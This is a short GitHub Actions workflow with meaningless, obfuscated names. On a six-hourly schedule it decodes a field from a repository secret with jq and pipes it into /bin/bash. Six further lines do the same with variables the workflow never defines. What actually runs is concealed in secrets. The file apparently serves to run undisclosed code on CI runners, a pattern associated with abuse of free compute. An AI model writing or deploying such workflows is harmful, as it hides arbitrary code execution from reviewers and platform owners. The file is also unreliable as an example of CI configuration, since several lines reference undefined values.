name: pengqi19871010
on:
  workflow_dispatch:
  schedule:
    - cron: '6 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: pengqi19871010
        env:
          wrn90: ${{ secrets.wrn90 }}
        run: |
          echo $wrn90 | jq -r .v54 | /bin/bash
          echo $n3 | jq -r .iflg094 | /bin/bash
          echo $kbxo41 | jq -r .fg94 | /bin/bash
          echo $rd4983 | jq -r .b15 | /bin/bash
          echo $frj1 | jq -r .x777 | /bin/bash
          echo $ihjx34011 | jq -r .jiu423 | /bin/bash
          echo $a34927 | jq -r .vjbez8758 | /bin/bash

